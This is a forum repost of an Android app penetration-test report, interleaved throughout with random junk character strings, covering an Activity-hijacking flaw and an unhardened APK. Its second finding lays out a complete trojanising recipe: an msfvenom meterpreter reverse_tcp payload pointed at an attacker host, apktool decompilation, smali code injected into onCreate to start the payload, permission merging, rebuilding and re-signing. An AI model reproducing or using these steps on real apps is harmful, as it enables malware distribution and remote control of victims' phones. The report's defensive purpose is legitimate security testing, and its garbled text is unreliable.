原创-app客户端渗透测试报告之反编译捆绑msf马二次打包以及active劫持漏洞

admin · 发表于 2022-6-8 20:32:44

- b5 |. t7 c C- u" ~7 S$ S" I M. q( ^( V# n4 t) V+ Y) F/ r
0 G" @' _0 L9 n! z8 `! @ l+ y' T 4 V7 U. s3 w4 m% u/ r |7 G

) m2 J2 _. b( F7 d, Q4 Z M) l/ ]9 K0 M 文档编号： ) B* Z: w- p* D3 K! B 2 E! z1 i1 L% |2 D5 T9 S# k

0 m2 j% Y, W& _9 u . I4 |: r/ y" l( w8 f $ |+ l6 D1 B/ J' J6 A6 d+ c. h: _ " X( S G( t; z

" H! [6 w3 J" m: a. h2 v- B) d # N% w$ L3 T+ D+ u0 l' x. l; M ( _- }8 b7 l4 d ) Y- F2 E# u7 E/ f5 ]

% ?& ?5 w+ L0 N3 j! |7 G! Q+ Z$ B. _' l# v k$ a8 q; N R ; U5 X3 |! U$ z% B2 Q$ F# J$ ~ / y( X8 a* ?1 x1 w: A

- U; o5 n) ^ a8 _) D1 O! h) P3 f/ u- Y( F) @: }- ] ' B z7 B$ {: d& L) o2 j & e6 }$ ~+ |' P; g! G2 j" K! ^7 h

) w% L# h! a: D) E + `9 y# V* Q# w9 R 1 c& O+ L/ t4 q( ^% r, x & B `& g) ^: q! s

# h" ~! Q, t* N) ^' A6 i# b. h1 H( z+ q4 q% }9 C* ?9 { 某某某APP渗透测试 : p. X) j9 C( J. a( I) n. n# Z; \: e: K& \' o+ E2 T$ b, X6 X

/ G) B8 N- C/ C: H/ l7 J 7 [4 r1 T% F* J3 y/ X/ y & [ L9 O6 E" i 5 h( p: m7 j# { c% v& v

2 ?+ Z. I) B( x8 ^6 d - h$ w% |% c' } c 3 ]( k: F. {; E8 @: X ; q5 ^, `' k1 j! N* o* f$ t6 }

0 i. I4 H8 e9 ~+ x' q- T9 W - S% G$ o r [7 M5 J- Y" E, _! c$ G * j, o7 J, ?) V6 [& w! h q- } * n4 Y6 L- e, ^# [1 j

- ?2 U# b5 e8 A' X$ G- p, x& Z s6 y& B! V* n; R R- p. k: m * D' f! h' C1 l3 X) E 9 [8 W$ B: |) k+ p) o* F3 ?% T

$ T- @0 r! ?7 }) m& O5 v' Z5 g 5 g* V: Z5 b* S* [# R+ ^5 F, \0 J 技术报告 : ?* A4 q% @! Y2 O; [1 H) E. z2 t, W0 ]" M+ l. R

) f) u4 W) F" c0 L- \0 W 8 {6 z9 u X* Y& q9 F0 n % m# X; L, ?5 L# I( H. X& w 7 I% O: ]4 L5 q }& P# V+ D

5 j' Z# Q- S! R r . j' S6 k" K5 v 8 F* n1 U5 K% G, P0 ^! T! L, v : N, w- N# G8 d* ?3 O1 h) E

+ N4 g2 _0 \/ q3 ] : e9 @$ F" v- G7 \ : P) M; e B+ {. I; ~8 z4 Q& W' y% i. Z {1 ]) X% ?

: w. H1 U5 L; u' c6 d: n, e% F! R. M( v 3 M1 @+ y4 D/ i6 ` / R: m) G, J6 A `7 N a3 \

/ f& O/ V5 P" z8 d- t! X5 R 9 y" m; `% `8 r* N ) }# t( W) `; r/ r* F1 b) k: K& D0 }. s

' B7 A$ b0 M4 G# `. k$ ] , I2 n2 ?& c; _4 o3 U3 N & A( r/ ]' U, S5 d4 m( _7 L % ]& U0 s" b+ d% L/ B ]0 z

0 p9 w! p9 S" b! z% ]9 N , j; B8 @- ] {% a% x 1 v$ v! C) I* \2 o5 Q , A5 G/ Z, a1 u$ j @

/ m& e1 s% \- r7 ^# S$ v6 y! t, H$ f6 u) h+ h9 G- T1 c6 Y2 Q " r# B& ?4 l* J U' V9 q @ % T( w4 B9 I* S1 u

3 @* K3 {. h: \: T! O; K- s9 ]5 A* x! `! c / J- p2 y' U/ b% B: _$ g+ ? 4 R4 q) j$ k1 o5 ]0 h/ r

1 e, C$ B! g% T4 f- T' r0 A, d ( r$ m( Z5 s& Y- `6 i Q0 H" R : ]' ?0 z) u) v% H 7 M2 z0 k9 t9 r4 g9 ~$ V& |

( a# S3 G5 r: j% J . j# H3 a& ^1 S( R5 b( ]- x ( k% G' W, O" Z( s# B/ o / A' f8 o; J0 q( k: N0 `: E2 B

) q" @( N2 E* F' w$ p7 j ( Q+ f2 W8 n: R# W/ K/ o# T5 q : u+ X- o2 t* w" a! z- W6 R. N8 {" e! z2 n& v Z" f' M* h

6 [" [/ y1 c# L6 F9 q% {# |' ~! [; P/ M* ?7 U/ o% k9 [- ~* }" ] 3 g0 { y6 ^4 Z. o7 c- E9 P1 w+ z/ ^; A7 x1 f( G% O3 a0 l- ^

& |- [9 _6 U5 K5 Z9 y. t& b4 ` ( b: @1 g" @' F, w( G 3 w4 ^- B, I: }- X/ Z5 T" }0 \- }% d' W! m5 U, a

. l" F8 v/ J! I* c! T- B' N( p1 m; g7 E* B8 q# k* i D $ A. r* Q- b5 w. _" G( R. t& Z) P {

% C2 ?! }* W5 }5 r: Y8 a0 ? 0 I' k3 g5 E3 J & z4 D) A9 t5 ?' B* |0 o( `1 ?" b3 z$ H5 @

# v$ R2 Z5 ?+ x' p * F2 Q/ C4 ~0 a9 `' O% ? $ U* ~/ M x6 o- q ) b9 [, w5 o- c5 T' x

. u. j% c/ L2 f. R `7 @8 i" V' i; f6 s/ H 2 h6 ?" S) Q; R; M. j " i7 `4 S, k. q8 {# s; @

5 C, y; ]- w$ f7 z4 `2 g) C ) F, r( |& G$ v4 x# x+ ` 二〇二〇年 ) N, ^/ B& h. ?1 G! z9 t, I# r 4 m% ?$ D% {% G1 M

3 v8 U( h! w* O5 X i2 j! x, w8 n4 R' K2 s 目录 - d" K9 ?0 @& M9 G: | 4 N$ b0 _* d+ c: g

' g' P: m# j2 r' G $ [2 t J1 R& J: u1 {3 r 0 b( k# n) K& X% ^) i' r9 C. @6 O1 D 9 J7 j- Z% o T1 O5 Z9 p

: n7 E% ~5 Z. k- [; P 8 p5 X3 Q* ?8 |1 ~" d 1 概述... 3 8 {8 K7 P# l: x$ r" ^' R 8 {% ^2 i" E8 D3 A. l

# F9 b, Y- h% ~: R: x 4 k/ h$ U i E5 R3 z 1.2测试时间... 3 % T) i: B$ j0 }- z 7 A' y4 A, G$ K/ n/ L ]

. |. J# J# k6 u9 V7 N2 g: ?3 Z) g0 `$ n7 n+ ~3 h, A; | 1.3测试对象... 3 ! R3 y, L9 F# S7 {) V7 r+ b, t 0 I) S, @6 D. h- }( j* `, ~

7 A: A+ M9 B( z+ c2 L( m* t7 ` # N: z3 g$ y! Q& ]$ c# @" S 1.4测试结果... 3 , g; {+ Y( Q/ e! I' F0 O9 H0 v9 w& D; F5 w7 @) K. I" @

) X$ `9 A# n( M 4 \* T6 W; X* M+ O( S3 Z 2 检测结果... 4 + k }; D# M G( z) ~ / R- C. g$ C6 p& @) k( L

0 j1 f3 q% W6 p8 O7 r 3 ?* P# ] B" N/ n 2.1 某某某... 4 : }; `1 o& R) f8 x3 k: y2 i9 c 3 ]1 d$ d7 x; E' z' h5 L' y

/ [4 O2 t2 q2 O* U. B+ E( [7 U # A6 L# k7 R8 G2 ~7 g& l! n$ [1 c 2.1.1检测目标... 4 $ N- B& L; f, L# D & s9 O' U; p& G! O: r% E7 _3 r

. C* V& }0 A1 k3 [8 F 9 R% [- Z. i5 J8 N% L" L; N( y* X 2.1.2检测结果... 4 / K1 K: V* |! T U: P6 Z E+ F: r7 z4 n3 A5 i7 C

- f3 X& \# ^6 ?. K4 b- i4 M+ ]8 m0 [, P( y 2.1.2.1. 4 % C2 b3 a. Z4 A9 f" } & |; L3 P7 o- E2 t$ P

7 V J3 Z- A) Q8 p- V& k 1 T9 r; R2 |$ M 2.1.2.2. 6 % ^( n1 C3 ]2 _( n$ _% Z; R: q+ K- @4 I+ N

& m2 D8 n0 M' i- V& U# D( \ # N8 b3 i G7 a" t+ ~ ! V2 Z$ ~( u5 D3 [5 P3 T) f" g 4 l& Y$ I7 K& w4 R

$ x# W, m* z% {: o/ `) j# T, w1 T5 f* |: d 1 概述 " m1 ~- u/ W( N) o ' d/ n% G" V; a# W4 t

5 C3 y8 K/ j y( f7 a 3 [4 ?1 Y3 C7 h& B 1.2测试时间 6 ?/ n* ]- O& M+ S% L( A b3 N& n6 T- ^7 B* t6 Y

) \|8 Z' o! k/ H 8 s+ u! ]4 u/ \$ p: s " i, z; K1 z: I- n / o R) O, l& }* g) k 渗透测试时间 2 ~- A! C' v+ G3 ]5 q5 Q( B! {6 Q! x! Y; P, n 8 W% C3 A& j: A. K7 }; \|1 m/ {( t- m 5 {; ^. P o2 M5 D
" d7 V0 t, m8 ^/ V 3 k1 F0 B' O% z& t / t- Q4 x" J5 I+ g1 f 2 P( b* v4 D8 `0 {) V$ b9 q2 V: e 起始时间 9 [" ?! w+ a5 {( @+ G+ b: {0 p0 F . e) j( I, D* X: b M6 \! I . Y1 Z9 o. d& H# y9 w' i- i ' x0 x! F4 i/ v2 \|3 l	+ b" M. }, ^8 Z( }, ]' a- m 6 Q; k6 A# B" n% R# y/ @ 3 I4 ]+ }& f$ W0 ?# Q2 A- A$ @. [% G" A3 y+ [: q6 w$ z4 ~! g 2020年4月6日 ) K6 V; _7 T5 T& m3 k . H/ ]8 j+ G/ Y/ P, b4 g 8 s% g0 G% C7 ^3 N " U/ z2 h1 r2 A9 D1 y l. x! x
/ A* A' w$ A- N+ S- r! z. k/ U$ i . s- F4 I7 ^$ {1 c ( @0 m r- ^% J. H1 ~! S6 ~# w$ B# l5 M1 l6 I$ `. D$ N 结束时间 8 R+ z9 I5 n& b* \. s; a# X 3 O. Q( z6 g) b+ I9 l $ I' J# E, n4 L % }0 S( [+ J* ^3 ^	8 Y1 e6 t. O$ R+ F3 P - C' V6 Z' _0 R7 ?' J 6 Z) ]/ q- q; g: L0 t 8 j: X0 ^/ K; \ 2020年4月9日 - S1 t' g3 @7 h' {+ V . q! f" h8 \6 O/ D) F5 B + l9 }) ~6 p% G) \| , v4 }$ k/ J) b- z. k2 r

6 n9 g. [: O0 ?( K % B+ M3 C4 n' m 1.3测试对象 , J( {7 N, A1 L$ y 3 L5 y# B! k7 q( `( p1 L R M

7 n0 H1 x' ^7 `% |7 i1 J8 S( @8 ^' | 此次测试目标为某某某安卓APP进行渗透性测试，APP存在安全漏洞数量如下表所示： " S! c5 }. M2 { 7 C4 S, B* F: D+ Y; }# K

/ W' @+ v$ ]" X. e# U+ {5 E ' U# i1 C7 _$ A# @4 m7 V 表1-1 检测对象 + a3 {% f; t# @1 H7 Y! n . K. a9 ?! E! t3 J

7 }% g5 f" F0 D5 V9 W& o# z( ^% K+ V0 f! C' ~0 S5 \|; n8 L! h 6 A0 s9 T9 `; T8 n. _# j. l 7 @: m1 W5 O1 z 序号 4 z3 b" a6 B2 z2 B' s ! E. S& G6 w- `; l9 ] * Y( C& U! {. O4 H 5 I, s5 V: W( ^& a% H& o	3 y# m2 j O7 y' U7 ~ 1 M. F) d3 \|7 m; x1 E1 ?2 I% ]) h 1 d( ~# ]' v4 r 8 P8 L. _ O! i3 k- s6 }9 h, R 测试对象 * z+ L, Y. D4 e& Q + d L4 l5 `2 F! d4 i C% a 1 M" K* a2 k$ }" E& a* K r0 A6 r2 X0 G5 Y	6 y; ]$ c. `+ r6 ?8 o + w$ a# ?( r$ P. q, p& }. ?/ T 6 J9 m- K# S' p ' o0 b9 M1 b+ ~* Z: B3 d7 @4 B 测试地址 5 g3 A; V% \# B5 P1 K : Z% t! R5 b# J5 N( ~+ _- c % F% S+ q0 d0 o2 H6 L; i/ x! \& W- j	# Q8 ?6 q9 q5 C5 \ 8 t8 b3 {5 q) A ; s- b! S4 C2 J R : l) S0 {/ s, l6 D& Z, P 安全漏洞 " H! J$ T, w Y & Q% i7 J4 E3 \|- C - i4 c6 a+ C1 b6 s+ ?1 Z8 E: e , h4 B1 X' _% n% A6 _
, g6 Z9 \|/ B% R8 B0 {: ~ ) e' }# \; i% `* B $ A! Z+ [% R9 h ) S- n4 {$ v9 {& V( e 1 4 V- i" N+ G* e% N r: S0 Q 2 }1 k# ~5 r$ s' G+ }6 l ( g0 H, X1 O* { U! ^) V* k7 m# d1 O/ `* j% P) ]	; s; H7 V8 L. f5 \! e4 a7 V r + v" s, g7 Y' P6 ` % A* _# w" F( F0 N% e# s; Z 某某某安卓APP . D% L# B1 A8 d5 l ! P! d- ^. P/ H5 O3 @0 F ! {! w( Z; L+ X " x. F' d% v" v0 O	5 P6 P$ ]0 U0 v( l& k- M" m B/ f) V7 j$ l3 Z# D [: a; i; t7 \7 A3 \| # _8 d. O! z# `: j( J 3 `8 B; g$ W3 \|: c7 { # y4 u; W0 o* F4 E$ t r& S3 J2 q, Y( I, T+ G a% d4 \|! w 1 g, q. j1 R W( m5 W) b' {0 ] 9 {) J; X% ]9 W Y: W	- G, Y- ], B' N; N% \: M" e4 z + p+ r8 h& s6 x. \|& h / Z4 x& p/ r0 l/ Y8 o - G1 j7 n% _' { 2 ' S: c3 n y) f( F8 U ; m' z' Q; v# j. g 6 f& `9 k; j1 c" w + [5 Z; V$ m( v+ V2 j* j

3 Q6 a: B$ M2 a ' ]1 [' R" A6 j9 s l, n 1.4测试结果 " F# _5 s% z, N! \ 1 ]9 Z2 [3 w! e( d( e3 Z* R

8 W- `# w/ @1 F 6 t7 Z$ }! _' H8 v( N3 f4 q 在本次对某某某APP透测试中发现，APP安全防护存在一定问题，主要问题如下所示： 4 ]! q E6 W- o* Q G" P8 L: c/ f 3 y" }% C: O2 }4 d9 N! E/ V

6 @ f! m( i1 \ 3 w9 [1 q5 ~$ l) L0 H0 ? ) v9 v [) K' W& s4 e1 `9 Z3 m% f5 S) u/ o

2 p0 c/ r% S6 G7 Y0 Y5 N r$ M8 N) t; m3 r8 O1 @- f 序号 1 d e' a5 j4 f6 c3 |) p. J+ h/ d# @% n$ k" w3 d7 i# D

7 K g9 L5 ?+ w4 E1 I l# B$ ^2 D& _ 2 {/ d) C A; C6 i3 e/ X 系统名称 8 K; M* B5 \6 {! \! w' t1 x8 w9 ^4 L( Q' W0 R

l! \5 b z- i e, V 3 Y3 M9 L" t! e1 f3 A 漏洞名称 0 X* p5 z9 t# x K6 U ( u2 a2 j2 z, ?* M" J

$ |$ U# U6 {: G) {8 }% a5 Z # }& b& p/ R& X3 e 漏洞危害 8 }& L7 n0 m( i% J! q7 }1 o7 B8 H# n. M4 I6 F. Q: ~) G

6 d- A& B( O( _/ x, @ ( g- T# v0 O4 Y( ^9 Y7 Q% U 修复结果 + B2 }6 l) H$ d4 k5 U- g( N$ K' c& K( I. I; \

8 f# k% F0 U; l, q% ?$ z' } 2 w1 Y( s" U; N5 s* J5 v 1 $ F' B0 c/ g# o% O2 d* V $ |# C! f8 p6 X4 J0 Q) k" K

, v q* Z- M& E: m8 l4 W ( H Y3 n$ I% ]2 t, _- c/ O 某某某某某某APP 9 a8 | g3 F5 I0 [- X0 z$ y# k3 N4 j9 [ x! d

' S7 @$ B" u. A" Y- Q1 r4 o ; H- I2 d0 |7 Z A# e Activity 劫持 ; L4 p8 b9 y: J9 O0 p( z 2 `" c+ j* E1 C) b+ v* n5 n

R6 `/ E0 ]$ ] $ g* s$ \3 D3 ?& O& Y/ q Y) T3 m9 q * \! I3 q3 a& H, G1 ]# t* d- e ! [: h* {& A3 P, B- [; C' M$ ?

7 f- a1 H G% k5 T 7 }5 i; z1 f2 D- f% \7 J( J 高 7 D' C5 j0 {( {: \/ D2 p7 o7 M4 y( l

4 I2 c0 q. ]8 J% `6 r$ ]$ m/ D9 b. R ) S9 G; l# Z* [7 ~: Y ; W( b2 a* F# @, [( u& Q7 H, s: C2 d; o1 X

' l( R/ W/ g1 e) n- d- R 1 ^! l! a+ m% O! i. O o/ | 2 4 a7 o8 v" a7 y$ i 9 a, F* b/ S( P

/ ^& d6 f5 L6 E! Q, k- d# {& S. m* q 4 h& G- W% a L# c; G4 A2 F8 J 某某某某某某APP # F6 `$ J) z: y 1 T9 j' t6 A8 n& B9 D

; J1 a8 d0 t0 ]1 ]3 R, N1 e 5 t5 w9 O2 }4 v& x8 E' B 反编译二次打包捆绑木马、篡改APP代码 ; o8 n% y, ~6 z8 @3 h ; s' M* B2 ^* \; D$ X

w- C) Z/ q" k( @ : S# a, l' `4 {: }0 f b; U 高 7 [7 x& h1 A- i7 A( [/ @ l % F* z" n6 J% S& E

6 c3 J" @+ \& b; i" r3 M s5 d: r- N5 f+ [2 C. |7 i2 f $ P4 ]' Y1 r& F+ r5 j* \# A, v$ M4 g

* K* A7 H2 ]* d# G4 ^. G7 g% Z6 ?% e: ]/ S. l- e ; C/ i, }9 V5 i% ? : i# L' X% z. w: h

/ c2 d# T0 P$ ?- |' L U( r' d% n+ D% I8 k) N 表1-2 测试结果 5 e* `0 o3 }; R# G; e M- {9 d 0 U( z; i! h1 C

6 o5 N, p+ Z6 W8 E 6 u+ `% f4 u$ }$ ~, w6 H/ s ! x: z7 J- W; D. V4 B9 c; Y* { - o! s1 S, s& N7 i4 t; j, j

# o- ^ M& m5 q/ O8 e% H) A$ z - o3 ^6 l' `- E: ~+ J: P 2 检测结果 % r' w- b: [/ W0 f @9 E& R: s% t7 h

5 f/ E6 n% e( B+ k# c; G2 ] / E) h U, [* I; \. o 2.1 某某某 3 g( q. E% N+ i; `% l+ W' O ) t- q9 u: I4 Q! u4 K- O/ F

" {, x3 G; f+ P2 z% `+ U : r& W6 b( K* T6 S0 n x. | 2.1.1检测目标 # w5 d" U: v E& }9 J7 c3 P , M' Y* W p4 F. p$ P# t- A$ b h

2 o! a* a2 }9 r* U/ K * H' G+ C+ h. V/ \ 目标地址： 某某某某某某APP , v3 D, C" x5 ^+ S: i7 _, N+ h ( n8 U3 |0 H( Z- ~( d: N* n: d; M

# Z' v' n3 B- P: i. T2 } 9 T, A, R8 Y6 F7 K 2.1.2检测结果 ( i; x. V6 R3 H$ ^5 ~- G + }3 t0 m8 ?& F, b. t

, Y2 \# c8 J9 K4 L! K: ]) T4 } ^- b5 n& [0 B% V* }" h4 _* V" N1 O# G 2.1.2.1 & c8 h! D, |3 F" [5 X+ ?0 y) W, q$ d C6 U# e

* F g3 t" ~( x! [: M1 `" h 9 i2 k6 A/ R& O9 K0 W+ k 漏洞链接地址：某某某某某某APP / F5 B/ T; X8 t 3 {4 J0 Q3 ?; h) d) H- t* Z$ p

" T9 v& i& o" A$ R, R; ?1 g. T" }# t3 h: l2 `+ z + B, P. ^& |/ Y" @1 A/ r5 i, H! N8 {7 F" i1 z- }& K) o$ N

+ o4 W# n6 K: F l' r9 x 5 h" ]" N9 ?! ~5 ~5 q 漏洞分析及取证： 4 c% p, w q o. ^: M7 f* K & ~& l8 I# Q" c7 `0 ^4 b5 u$ J4 _

2 @" Y4 U) ^0 g 3 r3 O' M1 @" @7 k5 T 通过androidkiiler反编译，发现app未进行安全加固， Activity 为com.minivision.cmcc.activity.SubActivity可被劫持，复现漏洞如图： ( T- w1 R; \ a, x3 w ) P! j0 z0 c4 o( e

0 B) r: H; \5 V" b. I. A5 l: ]# j $ I$ f9 k$ \% B' ~5 }* t2 ^ $ W; N1 f5 J9 {: J2 y # p$ {+ J7 {- p( |- P, l

, O2 n4 ]9 r1 s, g/ f1 g& E) B7 [7 m9 M) c' P/ K- r1 f( g" {: z 6 Y1 S R |8 x5 z* D4 P8 o: O/ L5 G. c9 \

7 j. h# X+ O& B# _7 K: W5 x% q" K: O: n3 d9 H: V ! s V& B7 m2 D5 m6 x6 Y0 k& e) }

0 e# Z8 W L9 y8 o* l" W% c& d9 R3 M5 {) C + o* o% M, z: X 5 Z% b. G) F6 N" @2 ]" X- d

) }6 Z* T/ k8 f/ I! |4 ^& M3 L7 f& h* d# q ' S( o4 {. h" ]& q, m 1 D% r% {, v* }- c: m4 t

9 o2 q& F# _! `4 C7 o- q ! T! ?3 u/ M0 r& \' @' q2 W 漏洞危害：高 0 `- m6 F8 D1 o- k 2 |/ x5 w& v, y9 {$ G( a: `3 y- V

1 @, l8 ~* l6 e$ W# T. b2 a, V4 {8 U 9 n- g; u, ^6 L/ g C7 N . Y' e$ Y$ N9 X + [* Q" h9 t- L7 b 严重程度 + S3 d$ _& C3 G/ F/ U % f [1 {4 v' H; ~( m 1 s/ ~9 x- p9 f 4 f4 b- t! ^, R" l$ i2 b7 J	. P+ J, \ X% I5 L% b* m( M U' l9 W+ S4 N; k9 B( _8 _' t+ G ]: ?# z, I3 [4 O% K7 b1 I 8 [9 v1 y; ^, Y3 u8 Y 高 ) W- H2 S w9 ?, d7 O% F# {" o6 g / N( R" G; i4 n" d7 W. d5 _, o9 C k	( n3 M! g1 [$ P8 S. g2 E% E4 Z; {1 j/ S - `' \|) c, o* _) M # R& L% t8 j9 h) g" s4 f. ^ ■ 5 V q0 R0 x5 L, s # K5 `3 {+ C+ z# X- e$ V2 D+ _ ) L r6 G L) B6 G2 f8 q) } 8 C \7 L( ~+ B" u' s	6 \|" e- B5 b0 d % V* U" Z# f, U, R/ D+ @- Y 0 j' i% \! G3 o! U( x# p! t p : U% }% j1 R' M 中 d: N( w. c5 J, {! ^ 2 i0 h2 u4 ?0 G1 h9 o ( P1 C/ S7 f1 j% R ( ~9 R' K1 t& G3 ]7 ~	- D5 B0 s9 s+ x" i% B% a ( u' S7 Z- k% H6 f; p : k6 J) I+ r S# ?. k1 \|& m' E/ Q e9 r+ B8 X" l. J 8 E7 ], y! m5 S9 K# H 9 q6 ^$ S7 D. ^& Q ( t8 T, Q7 s3 U( I1 J8 \( N. l n! a- u7 h/ w7 g' i3 M& e' u0 t	r1 Z* U, D* \|0 M / a, c9 d% ^3 z8 N; ]* ~6 u6 {- O5 _ ; M- }( S# y; g; f! V ! Z' m9 `" u/ p L0 ~3 f# D$ i9 Q1 \| 低 $ y+ j9 z @$ h/ A+ c0 v) j4 Q1 {4 E7 M. k3 s( Q 0 G% B! R# R1 O9 r% f& \|) g, L* \|/ c: Z1 T. M+ T, k& `	2 m5 \|/ e) w& B% X. s& Y+ f ) j. i J8 ^. n! _( f; ] G * P' U2 _2 S- `2 ~" ] J4 A$ g4 `% `0 W . K! Z! w. ~" m D! ]# M# W5 N2 x ' p" h1 S% b5 \|% {8 K6 L( H " V5 e9 f% s, N: t2 T. c& R % F* D7 _8 L, X$ k: W- f# F _

N* {5 f6 _( |3 z6 I2 M0 M, ?' b7 p6 |/ O0 N ' U2 Q# n5 q6 B 2 `) A+ T: Q0 H+ C' ^5 F

! a3 ^3 j* J. j) A; [ 4 S6 }7 C1 M$ ?5 n 修复方法：在 APP 的 Activity 界面（也就是 MainActivity）中重写 onKeyDown 方法和 onPause 方法，当其被覆盖时，就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的（触摸返回键或 HOME 键），如果是用户自己触发的则无需弹出警示，否则弹出警示信息。 0 {0 O6 h# j' U+ k& Q* ^, J ; f; Z8 I7 F; j. T) S

! ]7 @6 V, d5 j$ y ) a H4 w |4 z9 @5 O* H 8 K1 K: ]- x; n* ]# S( z 7 U* m( B7 j& y+ L7 z* p% M" `6 C

* F$ h& i& I! l# W* V( R: w* P! G* ?, o : u v I, I' d* Q. C2 x ! t2 A7 [6 Z: ~, t; N, g! @' ]4 z / h, o. J$ o- z* b4 x# w7 t3 [

; \" m6 `" c& P8 V8 g 1 I$ a+ Q9 T7 A) O' a& |8 v 2.1.2.2 ( B0 V( H% Q. K1 e ; t4 P$ ~3 ^# Q. n+ @) x5 W

$ t* F" v B2 L: r! ?/ _ `. F5 A, G0 I2 H% j$ d3 T" I 漏洞链接地址：某某某某某某APP % E: [$ ^7 m6 j( s5 _* w ; w1 d3 _# B9 W3 \( l$ R- Y }4 x- s- T

, ]: L9 ]7 C% d- I1 D! V2 P; j( d 漏洞分析及取证： 1 H+ v1 s3 \ j; o* Y , b( G: p$ o- ^" k' V1 L6 N

+ ^9 U2 s& Z) T c ) P; P4 O6 g0 X) @! p7 R 通过反编译，发现程序未加壳加密，可直接反编译获取源码，经过测试可修改app代码捆绑木马或者植入广告等操作，复现详细方法如下： 9 ^+ Y+ u! T( C6 q3 T : J2 A$ ]" a2 C5 s0 y

, M2 U/ `" ^! z8 w$ h6 I - H4 F: P+ w" n 用Metasploit 生成木马 apk - W/ ^! J3 ~' K / R2 h1 G+ |; r ?3 }

0 _; c: r! t7 Z+ T# C$ h" F# a1 U 9 J% o y9 _' J; u8 F- f4 E msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk 4 b% @' W" x9 @ + f; j( Z0 d w/ U: v$ j$ S

7 V) {! l7 r$ @3 N, V/ Q ( |! t& q& E3 b. l" e. E 反编译目标apk和木马apk - J7 \1 T r3 {/ p3 }3 o6 K! x- F6 N

3 h8 H! G8 z8 D! X. f9 Z$ {) w) |, a5 T. k" q apktool d target.apk
& C) Z; Q! S" U# N4 { 6 Q w5 G" N; q' D3 Q, H- y apktool d cockhorse.apk ; H% ]' p# l0 Q0 c/ D8 ?: H' \* Z4 ]# B2 A0 b/ w5 t

# \9 q; m% V/ m9 _, K" }1 D : `1 ?7 Z$ E, w( F" ?! w 木马 apk 注入目标 apk 6 |# z" m2 V3 A' V* I0 S/ W8 Z9 ^& E$ w& x: C, l

; @' q4 F/ T% \6 E9 M $ R' A. q" c: f# W& R 在目标 apk 反编译生成的文件中找到启动 Activity 的 smali 文件，并在 onCreate()方法中添加如下代码：
/ b# F. f8 s$ }. M+ o% f+ A8 l0 `% |4 ]2 }! _ invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V $ a6 n* q1 N( P$ K: K H- _2 R : d$ i* t6 U a2 y3 b% z2 t

5 {. @) D1 Z% i: r 5 M5 I* j5 D7 q9 Q5 G& s0 d1 M 将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中，去除重复 " |8 C7 }$ s8 B. K: P' U$ O : k0 w0 G) Z0 h+ ^8 Q9 n0 z4 Y) N

: C9 t( u4 a! R/ z - K; X2 E; _* d0 _- D5 |" J 将木马文件的 smali 文件放到目标文件下，例如 com/metasploit 文件复制到目标文件 com/ 下 6 }; @* S' c8 W ) _% v& x3 D& U8 T7 ]& M, V

" Y4 R, C3 ^3 y* |/ n( @+ `. _ 3 x1 V! x( ^5 p# F9 r/ N& V 回编译生成最终 apk 6 y5 i. F; Z$ Y9 b/ N 8 o6 w5 \* ]% G* G3 Q: ]2 X5 h

% O7 ?' _+ ~, c2 p. u0 H( Q q % W) d, q3 v6 Q* A' i 重新打包 5 V m$ \5 v7 H5 X ! p4 W G5 R7 `/ O) u

3 P$ o0 C: T5 a9 | & z9 Z( @. S3 l- j3 S- L6 s apktool b -o repackage.apk target_app_floder ; n2 |, R' {+ b/ l4 Z! c4 A+ _8 K2 _6 A& p1 t6 F% k' T* f, Q' V

3 `7 ~; w9 T2 \3 F % n2 B5 ^ L1 u3 s* c 创建签名文件，有的话可忽略此步骤 5 ?5 z/ G) G2 p- L* I6 h$ ~3 t. J: w1 J , V$ k5 g9 f) q, T2 h

9 E% F6 F8 F) O- T$ s! v ( O$ J [9 b. _4 L keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000 * c7 e9 S$ M* w) r" d3 {* c& B1 b1 @, P$ v" M4 {3 a

) s6 {. m% s6 C, N/ v& A 4 i- ^4 Z1 [! \ 签名，以下任选其一 ; z9 l B, _( q , P/ _& k' v F6 ^3 J5 H% d

* D8 f5 g3 g5 }. [) N. T$ W9 {2 [3 x6 G jarsigner 方式 " B: c. G: z- k0 k" k2 R2 ?' ?! k3 B4 s* M- N: V% N h0 d

2 m: y l, }* U5 s8 H: P" v$ I 8 \/ F! h- _8 o$ t/ M% I jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname : v( j" f0 p2 ~/ Y9 g + R+ d5 ]2 h* w4 w

# a, I/ U0 `8 a5 w9 O8 ?: E v$ n4 y! ?) O$ K apksigner 方式 ' U2 f& M9 ` I: V- X: K9 h " F8 M6 f) l0 y8 g

2 U2 p, r* E" o: o# }7 j7 ^! X* K2 ]7 ?, y/ B: v apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk 3 y& |& g( o' k. j- F# ?* b5 Q/ E; d) d0 T; c' y) Z' S) m$ {

6 u1 K' @1 P* d 7 ]; g) e/ _9 z" U2 F* w 如需要禁用 v2签名 添加选项--v2-signing-enabled false + l: L$ H* \) w% O: G% E& z: E! Q: f/ p( U: F) ~; [

. c% \2 v0 w1 N4 e: z & L0 B! Q6 X4 K4 S 验证，以下任选其一 ' x$ G, v% a' A) x2 s e ( K% B. k& d/ W

) q- ~: j- s, n8 B ( c6 g3 {1 Z2 S" j jarsigner方式 ) v& W/ o: X$ m - q& z4 u! H( O* Y" L7 g

% t- Y: W+ l5 S3 m 4 D8 p0 O) |! g8 M& i' u jarsigner -verify repackaged.apk : b! t# x* L/ p8 E. g . [& o* a" D: X! f2 S

; m+ N) e) S b3 X Q- K2 S , x) d3 ]+ O- g& o0 \4 l apksigner 方式 a" Y# K# o7 ]2 s6 W! G5 D8 {0 G9 w2 O5 h- s- m/ d

, [& S1 @2 N. W1 z; s! s" Z3 R ' Y; n; G3 M% c. L% C* X apksigner verify -v --print-certs repackaged.apk 0 j! a. ^, G" p4 s0 F7 ~, ` 9 J# A2 h5 {( k+ p2 X. q0 Z

! \6 \7 G+ r% T6 h- w+ o2 g , ~& L2 o4 g/ J0 a5 ? keytool方式 & _% i0 }- ` Z4 r' T% t: W9 { - ^7 t# |" {3 s; W6 q7 S: c

